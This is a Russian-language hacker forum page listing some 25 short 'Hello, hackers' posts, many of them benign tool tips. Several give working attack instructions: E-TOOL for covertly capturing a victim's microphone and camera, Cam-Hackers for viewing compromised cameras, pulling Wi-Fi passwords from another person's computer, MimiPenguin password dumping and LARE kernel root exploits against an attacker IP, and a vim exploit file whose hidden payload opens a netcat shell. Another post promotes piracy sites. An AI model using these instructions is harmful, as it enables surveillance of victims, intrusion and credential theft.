Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'взломщик'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • XAKERSAY
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

  1. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете без интернета посмотреть карту местности. Приложение-навигатор должно обладать особыми характеристиками, чтобы помочь сэкономить бесценный трафик и оградить тебя от судорожного поиска Wi-Fi спота в тот момент, когда ты уже потерялся. Maps.me - быстрые, подробные и полностью автономные карты с пошаговой навигацией. Доступны для iOS и Android. Скачивайте путеводитель и карты разных городов мира и пользуйтесь ими офлайн. Карте не требуется подключение к интернету, чтобы определить ваше местонахождение, автоматически определяет GPS координаты для построения наиболее оптимального маршрута. Офлайн-навигация доступна для пяти видов транспорта. Будьте осторожны, продолжительное использование GPS в фоновом режиме может значительно сократить время работы батареи. Очень удобное приложение, если вам срочно необходимо узнать свое местоположение, а интернет у вас отсутствует. Поэтому попробуйте, возможно оно вам пригодится. Сервис Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  2. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как вы можете читать удаленные сообщения в мессенджерах и социальных сетях на Android. С повсеместным введением фичи «Удалить сообщение для всех» жизнь перестала быть похожей на остроэмоциональный сюжет фильма. Представьте: молодой парень, тайно влюблённый в одногруппницу, наконец решается и пишет сообщение с признаниями. Проходит полчаса, и... «Удалить». Передумал! Может быть, это правильное решение, — сначала подумай, потом сделай, — но безрассудные поступки отличают нас от роботов. И кладут начало запоминающимся историям! NotiSave — это программа, которая группирует уведомления по приложениям и даёт возможность сохранять нужные. Всё просто: настраиваем утилиту так, чтобы она «курировала» соцсети и месседжеры → уведомления о новых сообщениях попадают в вечный архив. Удалил адресант message или нет, — не суть важно. Уведомление сохраняется! Рыба на крючке! Поэтому если хотите сохранять все переписки и для вас это действительно важно, то пользуйтесь данным сервисом. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете избавиться от ненужных файлов на вашем компьютере. Есть такие файлы, которые удалить системными инструментами практически невозможно, особенно для обычного пользователя. Зачастую, в такие моменты выскакивает что-то вроде «Этот файл сейчас используется» либо «Файл невозможно удалить: доступ закрыт». Невероятно раздражает. Как раз для этого и существует Wise Force Deleter. Для удаления файлов утилита использует 2 способа: завершает необходимые процессы и загружает нужные права для этого. Чаще всего приложение просто закрывает не используемые файлы, чтобы возможно было их удалить. Программа поддерживает drag and drop, что невероятно упрощает работу. Кстати, интересно то, что прога может работать через контекстное меню. Для удаления всего-то надо будет выбрать файл и нажать «Force Delete» (принудительное удаление). Поэтому если у вас существует проблема с количество свободной памяти, то попробуйте данную утилиту, возможно она поможет вам освободить место на диске. Скачать Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Приветствую, хакеры! В данной небольшой статье я хочу рассказать про очень полезный инструмент для установки утилит. DarkFly-Tool - является инструментом установки, для установки утилит. Так что вам не нужно вводить клон git или искать репозиторий github. Вы только должны выбрать номер, какой инструмент вы хотите установить. Есть 530 инструментов, готовых к установке. DarkFly-Tool - является инструментом установки, для установки утилит. Так что вам не нужно вводить клон git или искать репозиторий github. Вы только должны выбрать номер, какой инструмент вы хотите установить. Есть 530 инструментов, готовых к установке. Установка: pkg update pkg upgrade pkg install python2 pkg install git git clone https://github.com/Ranginang67/DarkFly- Tool cd DarkFly-Tool python2 install.py Использование: cd DarkFly Каждый кто использует большое количество различных утилит, однозначно должны использовать данный инструмент, так как это значительно уменьшает затраты времени. Также это просто очень удобно, поэтому пользуйтесь. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  5. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете засорять логи своему провайдеру. logspamer - скрипт, который заходит на разного рода сайты, прописанных в коде, засоряя логи. Установка: apt update apt upgrade apt install git -y apt install python -y pip install requests git clone https: // github. com/TermuxGuide/logspamer cd logspamer pip install -r requirements .txt Запуск: python logspamer .py --config config .json Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  6. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как вы можете посмотреть карту всех ваших перемещений по миру. Известный факт: Google следит за вашим местоположением и знает все места, где вы были. Скорее всего, вы используете сервисы Google много лет и за это время компания собрала огромную базу ваших передвижений. Энтузиасты придумали сервис Location History Visualiser — в него можно загрузить эти данные из истории местоположений и увидеть тепловую карту всех ваших перемещений. На ней видны все улочки, которые вы посещали при включённой передаче геолокации Google. Инструкция: переходим в Google Takeout, выбираем только пункт «История местоположений» и нажимаем «Создать экспорт». Так вы скачаете копию хронологии передвижений. После этого распаковываем данные и загружаем файл «LocationHistory.json» на сайт. Готово! Он визуализирует данные в красивую карту ваших перемещений по миру. Всё работает прямо на вашем устройстве и сервис не получает ваши файлы. Поэтому пользуйтесь, если вам интересно узнать эту информацию или возможно вы можете использовать эту информацию в каких-то интересных целях. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  7. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете защититься от прослушки на Android. Февраль 2022-го — роковой месяц в новейшей истории. И июнь 2013-го — тоже примерно из такой же категории. Но все ли помнят, что тогда произошло? Тогда мир узнал, кто такой Эдвард Сноуден. Американский технический специалист стал героем — когда опубликовал секретные документы Агентства национальной безопасности США. Они стали прямым доказательством тотальной слежки — за всем и за всеми! С тех пор микрофоны на своих устройствах заклеивает не только глава ФБР Джеймс Коми, но и миллионы простых пользователей. Правда, уродливая липкая лента — это как-то топорно. А вот Micro Guard Blocker — совсем другое дело! Пара кликов, и смартфон полностью защищён от таких приложений как Spyware и Surveillance. «Да пускай верхи слушают, пусть хоть заслушаются!» — подумаешь ты. Ну, во-первых, это рабское мышление. А во-вторых, хакеры. Поверь, они найдут способ наживиться даже на такой, казалось бы, не особо чувствительной инфе как запись с микрофона. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  8. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно прослушивать микрофон или камеру с помощью Termux. Для тех кто не в теме, Saycheese и Sayhello удалили с github, а нормальных аналогов до сих пор нет, поэтому прилагаю для Вас актуальную утилиту. E-TOOL — скрипт на основе bash, который можно использовать для получения доступа к микрофону, а так же фотографий с телефона жертвы. Установка: $ pip install lolcat $ git clone https://github.com/Expert-Hacker/E-TOOL.git $ cd E-TOOL $ bash setup.sh Использование: $ bash main_script.sh Выбираем нужный пункт. Но есть один большой недостаток: ссылку вам не выдадут, поэтому нужно установить ssh и запустить все на порте 3333. Установка ssh: $ apt install ssh -y Метод: $ ssh -R 3333:localhost:порт локалхоста nokey@localhost.run К примеру, прописываем $ ssh -R 3333:localhost:8080 nokey@localhost.run, после чего получаем ссылку в терминал. Для сохранения файла переходим в папку voice/camera, и пишем следующее: $ termux-setup-storage $ cp -r название файла.формат /sdcard/ Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  9. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете получать SMS-сообщения прямо к себе в Telegram. Доступный интернет, мессенджеры... SMS знали лучшие времена. Подумать только: раньше мы отправляли друг другу сообщения за деньги! Некоторые операторы даже исключили SMS из пакетов услуг и предлагают пользоваться ими за отдельную плату. Но всё-таки реальная смерть смс-ок наступит ещё нескоро. Да, в западных странах (и в России в том числе) смартфон есть у каждого второго пользователя, но во многих местах планеты люди по «старинке» используют обычные сотовые телефоны. Впрочем, это уже совсем другая история... smsQ - перенаправляет SMS-сообщения пользователя прямо в Telegram. Но есть «нюанс»: лакшери-опция есть только у владельцев смартфонов на базе Android. Данная небольшая программа может быть огромным помощникам тем, кто занимается различными рассылками, кто вынужден получать множество смс на свой номер телефона и хочет как-то это систематизировать. Получать все сообщения сразу в Telegram очень удобно. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  10. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете редактировать или даже вовсе удалять данные с PDF-файла. Как многие из вас знают, интернет пестрит различными инструкциями об их удалении из фотографий, но в то же время инструкций об удалении метаданных у PDF-файлов не так уж и много. При этом, PDF-документы, практически как и фотографии, сохраняют данные об имени пользователя, создавшего файл, а также дату создания и его последнего изменения. Для редактирования или удаления подобной информацию можно воспользоваться бесплатным онлайн-сервисом под названием PDFCandy → ТЫК ←. Сам сервис представляет собой весьма обширный набор инструментов для работы с PDF-документами. Также, сервис позволит вам воспользоваться такими функциями, как сжатие файла, конвертация в другие форматы, извлечение текста, защита паролем, добавление водяного знака и прочими. Вот такой вот небольшой сервис позволяют полностью удалить метаданные с PDF-файл, что значительно повышает вашу анонимность и безопасность. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  11. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как вы можете скрыть собственные данные от Windows 10. Давно ни для кого не секрет, что Microsoft следит за пользователями Windows, собирая телеметрию для своих нужд. Но с каждым годом, слежка становится всё сильнее, понемногу забирая частицы свободы и конфиденциальности у пользователя. Защитить свои данные от Windows 10 поможет Windows Privacy Dashboard. Программа позволяет настроить групповую политику, системные службы, планируемые задачи и остальные параметры, отвечающие за сбор и передачу информации на сервера Microsoft. Также с помощью WPD вы сможете легко удалять предустановленные приложения и любые другие нежелательные программы из Microsoft Store. При использовании WPD можно настроить точку восстановления, это позволит обезопасить систему от необратимых последствий, а также санкций со стороны Microsoft. Таким образом сохраняются все текущие настройки, установленные приложения и данные, которые должны передаваться в Microsoft. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  12. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете узнать пароль от Wi-Fi роутера без какого-либо взлома. Давайте на минуточку представим, что вам в руки попал чей-то компьютер, на котором вам нужно узнать пароль от сети Wi-Fi, к которому он подключен. Сегодня мы покажем вам, как это сделать ! Погнали! 1. Вызываем командную строку введя "cmd" в поиске. 2. Нажимаем на "Запуск от имени администратора". 3. Затем в командной строке пишем "netsh wlan show profiles". После чего вы узнаете название сети. 4. Далее вводим "netsh wlan show profile name="название сети" key=clear". Сам пароль от Wi-Fi будет показан в поле "Key Content". Далее вам остается сделать скриншот или сохранить в избранное, чтобы не проделывать данные действия повторно. Вот таким вот интересным способом вы можете заполучить практически любой пароль от Wi-Fi, если для этого будет созданы определенные условия. Не нужно париться с программами, со взломами, все делается быстро и без каких-либо следов и лишних телодвижений. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  13. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете проникать во взломанные камеры видеонаблюдения. Это очень важно, ведь после взлома камеры, ваша работа не заканчивается, вам необходимо каким-то образом проникнуть в них. Ведь в наше время камеры установлены практически везде, на каждом домофоне, остановке, парке и так далее. И не все прошивки, установленные в камерах, могут противостоять нападкам со стороны хакеров. Именно поэтому, многие умельцы создают специальное ПО, способное взломать и отправить в открытый доступ изображение с практически любой камеры. Примером послужит Cam-Hackers. Установка: $ git clone https://github.com/AngelSecurityTeam/Cam-Hackers $ cd Cam-Hackers Использование: $ python3 cam-hackers.py После выполнения последней команды, и загрузки всех компонентов, вам будет предложен список из 89 стран, выбираем любую и просматриваем камеры! Поэтому если вам необходимо эффективно использовать взломанные камеры и быстро проникать в них для использования, то опробуйте данную программу. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  14. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как вы можете превратить флешку в физический ключ безопасности, то есть буквально открывать рабочий стол компьютера от флешки. Если вы не желаете использовать привычный пароль, можно воспользоваться инопланетными технологиями — функцией Windows Hello. Она позволяет разблокировать устройство специальным физическим ключом. Для активации этой фишки заходим в «Параметры» — «Учётные записи» — «Варианты входа» — «Windows Hello». В качестве ключа можно использовать обычную USB-флешку, но сперва её понадобится перенастроить через утилиту USB Raptor. Необходимо придумать пароль для разблокировки — это на случай, если устройство будет потеряно. Далее выбираем флешку, которая будет использоваться в качестве физического ключа, нажимаем кнопку «Создать файл ключа» и устанавливаем галочку возле пункта «Включить USB Raptor». По итогу, если вытянуть из компьютера флешку, он будет сразу же заблокирован. Ну а для разблокировки ключ понадобится вставить обратно. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  15. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете сделать из своего Iphone неплохое прослушивающее устройство. Продукты Apple имеют немало скрытых и неочевидных функций: о некоторых вы, скорее всего, и не догадываетесь. Например, не все слышали про функцию «Live-прослушивание». «Live-прослушивание» позволяет слышать речь или беседу людей на расстоянии, с которого могут работать наушники. Они должны быть из серии AirPods или Beats, а на устройства iOS должна быть установлена версия ПО 14.3. или более поздняя. При функции «Live-прослушивание» iPhone выполняет роль микрофона, который передаёт звук в наушники. Сначала функцию требуется добавить в пункт управления: перейдите в «Настройки», затем в «Пункт управления», прокрутите вниз и нажмите кнопку «➕» около кнопки «Слух». Затем откройте пункт управления. Подключите наушники, нажмите на значок «Слух» и затем «Live-прослушивание». Поместите телефон напротив собеседника, которого хотите услышать. При необходимости отрегулируйте уровень громкости. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  16. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете перенести видео из YouTube в VK. Плохо дело: YouTube занял жёсткую антироссийскую позицию. Причём «жёсткая» — мягко сказано! Там не только отказываются удалять «недостоверную информацию», но ещё и блокируют каналы российских государственных СМИ. Пока Роскомнадзор хранит молчание, но сдаётся нам, это затишье перед бурей. Что YouTube нужно убрать, считают чуть ли не все органы российской власти. Ну а мы, как всегда, надеемся на лучшее, но готовимся к худшему, — видео из YouTube лучше перенести на другую платформу. И почему бы и не в VK? Благо команда разработчиков из Белгорода запустила VK Video Transfer. Этот сервис «релокейтит» в пару кликов! Либо все видео за раз, либо отдельные. Правда, не без ограничений — можно выгрузить только до 1000 видео за цикл. И, да, с чужими роликами такая тема не прокатит — приложение просит подтвердить, что каналом владеешь именно ты. Суровая кара! Но справедливая. В общем, здесь лежит подробная инструкция по переносу. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  17. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как вы можете транслировать экран компьютера на любое устройство. Deskreen — бесплатная программа, которая позволяет превратить любое устройство с дисплеем, Wi-Fi и браузером во второй монитор для компьютера. Вы можете расширить рабочий стол, дублировать его или вывести по одному запущенному приложению на каждый девайс. Изображение передаётся через браузер, так что нужно установить программу только на один компьютер. Для того, чтобы начать транслировать свой экран нужно: Включить программу, подключитесь на компьютере и другом устройстве к одному и тому же Wi-fi. Отсканируйте QR код или введите указанный адрес в браузере вашего устройства. Нажмите "Разрешить", выберите что хотите транслировать и нажмите "Подтвердить". Готово, теперь изображение должно показываться на вашем втором устройстве. Также можно подключить сразу несколько устройств и транслировать разные окна приложений. Поэтому это отличный вариант как для личного пользования, так и для проведения различных мероприятий. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  18. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о нескольких малоизвестных, но очень хороших браузеров для смартфона. После покупки смартфона мы зачастую не ищем новых решений и пользуемся уже установленным Google Chrome, однако со временем замечаем, что браузеру не хватает определенных функций: возможности использования расширений, кастомизации интерфейса или уклона на приватность. Некоторые разработчики решили пойти дальше и предлагают своим пользователям функции, которые отсутствуют в популярных браузерах: Vivaldi — имеет компьютерный стиль вкладок, а так же дополнительные инструменты боковой панели, благодаря чему, удобен при работе на планшетах. Brave — главная особенность заключается в защите данных пользователей, блокировке тренеров и рекламы. Kiwi Browser — поддерживает большинство компьютерных расширений из магазина Сhrome. Если вы хотите попробовать что-то новое, использовать новые функции, к которым не двигаются все популярные браузеры, то можете смело пробовать эти варианты. Рекомендую попробовать каждый и решить для себя, какой для вас будет наиболее удобен и комфортен. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  19. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете настроить автоматическую блокировку Windows при вашем отсутствии. Если вы часто отходите от компьютера, забывая заблокировать его вручную комбинацией клавиш «Win + L», то вам поможет функция динамической блокировки, которая позволяет блокировать учетную запись при отдалении связанного по Bluetooth устройства от компьютера. Чтобы использовать данную возможность, сперва необходимо выполнить сопряжение с носимым устройством. Для этого перейдите в «Параметры», затем раздел «Устройства» и в пункте «Bluetooth и другие устройства» подключите нужный гаджет. После чего, вернитесь в «Параметры» и перейдите в «Учётные записи», а после в раздел «Варианты входа». Пролистайте до пункта «Динамическая блокировка» и поставьте галочку напротив «Разрешить Windows автоматически блокировать устройство в ваше отсутствие». Теперь вы можете проверить, работает ли функция, убрав смартфон за пределы допустимого Bluetooth-диапазона вашего компьютера. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  20. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о нескольких программах, которые позволят очистить место от лишних программ и различных файлов, тем самым оптимизировать работу вашей операционной системы. Погнали! 1. Auslogics BoostSpeed → ТЫК ←. Данная программка позволит вам настроить службы Windows для повышения производительности системы, а также отключит нежелательные отчеты об ошибках. 2. Reg Organizer → ТЫК ←. Тут у нас органайзер, который предназначен для удаления остаточных файлов, полного удаления программ, оптимизации реестра системы, а также для очистки временного мусора. 3. Razer Cortex: Game Booster → ТЫК ← Программка для оптимизации работы компьютера, позволяющая повысить FPS в играх, а также автоматически останавливать фоновые процессы. 4. Reduce Memory → ТЫК ← Приложение для очистки оперативной памяти от неиспользуемых процессных ресурсов, по достижению определенного процента заполненности. 5. Cleanmgr+ → ТЫК ←. Данная программка представляет собой достойную замену встроенной системе очистки дисков Cleanmgr.exe от Microsoft, которая охватывает еще больше ненужных данных. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  21. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, что делать, если начнут блокировать интернет. Самый простой и доступный способ — использовать анонимную децентрализованную сеть. Сегодня все больше юзеров начинают интересоваться, что же это такое и как такая сеть может помочь избежать блокировки интернета в России. Одна из таких сетей – UTOPIA P2P. UTOPIA легко обходит блокировку и цензуру, обеспечивая свободное общение, поиск информации, передачу данных, проведение онлайн платежей без слежки и утечки данных: 1. Скачайте и установите UTOPIA – ссылка тут 2. Анонимно зарегистрируйтесь – без ввода личных данных и номера телефона 3. Используйте UTOPIA для общения, передачи данных и сёрфинга в интернете – в случае блокировок, сеть все равно будет функционировать 4. Пользуйтесь сами и рассказывайте друзьям – безопасная и доступная сеть подходит каждому Позаботьтесь о свободном и доступном интернет соединении сегодня, чтобы завтра было где читать новости и общаться с друзьями! Сайт проекта – https://u.is/ru Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  22. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о подборке актуальных mesh-мессенджеров. Mesh-сеть — это распределенная, одноранговая, ячеистая сеть, где каждый узел обладает равными правами. О преимуществах и недостатках mesh-сетей подробно можно почитать здесь. Основным недостатком является сложность запуска и необходимость в огромном количестве участников. Преимуществ у таких видов сетей много, но ключевым является полная независимость вас от провайдера или власти, ведь вас невозможно отключить, расторгнуть с вами договор или прослушивать ваш трафик. И это прекрасно. dIM Chat — использует BT для связи, разумеется с шифрованием. Идентификация по QR коду. Для пользователей iOS. Fireside — использует Wi-Fi для связи, работает по протоколу NewNode. Есть для Android и iOS. Rumble — платформа для микроблогинга с возможностью общения (текст и фото). Использует для связи Wi-Fi и BT. berty — анонимный р2р мессенджер, работающий без интернета и сотовой связи. Не требует ничего для регистрации. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  23. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете продолжать пользоваться пиратским контентом. Сегодня в интернете плодили слухи о том, что сами администраторы популярного сервиса RuTracker будут препятствовать его разблокировке. Позже в администрации платформы заявили, что ограничения доступа не обсуждались, а факт ограничения объяснили необходимостью защиты от DDoS-атак. До сих пор не ясно, что происходит внутри команды RuTracker, похоже на внутренний конфликт. Torrends.to — бесплатная общедоступная платформа для обмена файлами. На ней можно скачать фильмы, сериалы, музыку, игры, программное обеспечение, аниме и другие торренты. The Pirate Bay — самый устойчивый Bit torrent сайт в мире. Можно загружать фильмы, музыку, книги, программное обеспечение и многое другое. LimeTorrents — бесплатный онлайн торрент-агрегат, позволяющий скачать ПО, фильмы, телешоу, аниме, игры. Bit Che — инструмент для поиска торрентов и их просмотра напрямую. Он ищет торрент-файлы на разных сайтах и выдаёт список результатов. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  24. Пост-эксплуатация в практике пен-теста Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений. Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы. 1. PXEenum — полное перечисление всего что есть в системе Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время. Для запуска он не требует прав root’а, работает в стандартном терминале. # wget //raw.githubusercontent.com/shawnduong/PXEnum/master/PXEnume.sh Установка: # git clone //github.com/shawnduong/PXEnum.git # cd PXEnum/ # chmod +x PXEnum.sh # bash PXEnum.sh 2. MIDA Multitool — палим систему по взрослому Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно: SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д. Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев. Устанавливаем скрипт в систему с github: # git clone //github.com/NullArray/Bash-Kit-Multitool # cd Bash-Kit-Multitool # chmod +x bashkit.sh Запускаем скрипт: # /.bashkit.sh Дело сделано! Можно запускать в системе! 3. MimiPenguin — тырим пароли без зазрения совести Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей) Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux. Устанавливаем MimiPenguin забирая его с репозитория GitHub: # git clone //github.com/huntergregal/mimipenguin # cd mimipenguin # ls –a # chmod +x mimipenguin.sh # ./mimipenguin.sh 4. LARE — ломимся под рута используя баги ядра И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8. Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP. Устанавливаем скрипт в систему: # git clone //github.com/EnigmaDimitri/LARE && cd LARE # chmod +x LARA.sh # LARE.sh -a Запуск скрипта на целевой машине в сети # LARE.sh -l [Attackers-IP] Запуск на машине с подключением к базе данных эксплойтов на GitHub # LARE.sh -l or ./LARE.sh -l Проверка и защита системы от техник пост-эксплуатации Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-day или устаревший софт.
  25. Приветствую, хакеры! Многим известно, что запускать неизвестного происхождения файлы небезопасно, но сколько человек при этом открывает незнакомые текстовые файлы, например, в текстовом редакторе? Особенно если это Linux и какой-нибудь проверенным временем текстовый редактор vim/emacs! Что может случиться? Краткое описание недавней уязвимости в vim Не хочу вдаваться в технические подробности дырки, которую нашли в текстовом редакторе vim, об этом написано немало статей (уязвимости присвоен номер CVE-2019-12735), но хочу рассказать о том, какую опасность это несёт и почему надо быть предельно аккуратным даже с такими, казалось бы, базовыми инструментами. Вектор атаки: вам присылают файлик, вы его открываете в vim, а тем временем у вас на компьютере выполняется код. Например, качается с удаленного сервера бекдор и устанавливается в систему. Причем вы даже не видите целиком содержимого файла, вся выполняемая конструкция замаскирована и не отображается. Демонстрация экслоита Рассмотрим один из экслоитов для vim. $ wget https://raw.githubusercontent.com/numirias/security/master/data/2019-06-04_ace-vim-neovim/shell.txt А теперь попробуем его прочитать, например, утилитой cat: $ cat shell.txt Nothing here. А вот что в файлике находится на самом деле: $ cat -v shell.txt [?7l SNothing here. :silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails('set\ fde=x\ \|\ source\!\ \%') fdl=0: [1G [KNothing here." [D То есть вы качаете незнакомый файлик, открываете его в уязвимом текстовом редакторе и у вас открывается шелл на 9999-порту и делай дальше с вашей машиной что хочешь. Вывод Открытие незнакомых текстовых файлов даже в текстовых редакторах может быть опасным. Если вы не доверяете источнику, с которого скачен файл, лучше запустить его в изолированном окружении вроде виртуальной машины, или тестовой vps. Как вариант — добавьте в ваш шелл (например, ~/.zshrc) следующий alias, чтобы хоть как-то обнаружить возможную маскировку шелл-кода в незнакомом файле. При условии что это не эксплоит к утилите cat, или терминалу. alias cv='cat -v' Ну и конечно же не забывайте обновлять всё ПО и ОС на всех ваших девайсах. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.